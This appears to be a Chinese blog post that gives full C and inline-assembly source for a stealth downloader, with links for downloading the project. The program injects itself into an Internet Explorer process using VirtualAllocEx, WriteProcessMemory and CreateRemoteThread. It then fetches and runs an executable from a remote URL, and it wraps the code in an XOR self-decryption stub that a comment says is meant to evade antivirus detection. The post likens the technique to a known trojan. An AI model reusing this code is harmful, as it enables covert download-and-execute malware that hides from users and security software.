一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码 ,举例下载迅雷而矣:
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//取消这4行的注释,可编译出2K大的文件
//#pragma comment(linker,"/OPT:NOWIN98")
//#pragma comment(linker,"/merge:.data=.text")
//#pragma comment(linker,"/merge:.rdata=.text")
//#pragma comment(linker,"/align:0x200")
#pragma comment(linker,"/ENTRY:decrpt")
#pragma comment(linker,"/subsystem:windows")
#pragma comment(linker,"/BASE:0x13150000")
//动态加载shell32.dll中的ShellExecuteA函数
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
//建立远程线程,并运行
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
void decrpt();
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用
// 注入使用的下载函数
void download()
{
hshell = LoadLibrary("Shell32.dll");
hurlmon = LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
//下载的文件自行调整
DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
ExitProcess(0);
}
void main()
{
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
// 1.获取程序自身路径,启动IE进程
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
WinExec(iename,SW_SHOWNORMAL);
Sleep(500);
// 2.得到IE进程句柄
HWND htemp;
htemp = FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
// 3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
// 4.进程映像的地址
Module = GetModuleHandle(NULL);
// 5.得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
// 确定起始基址和内存映像基址的位置
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// 6.写内存,创建线程,写数据
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
// 7.关闭对象
CloseHandle(processhandle);
return;
} ;
// 解密函数
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
//先把原代码,搬移到变量中保存起来
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
//解密搬回
int i;
for (i=1;i<=0xFF;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
__try
{
main();
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
};
}
return;
}
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/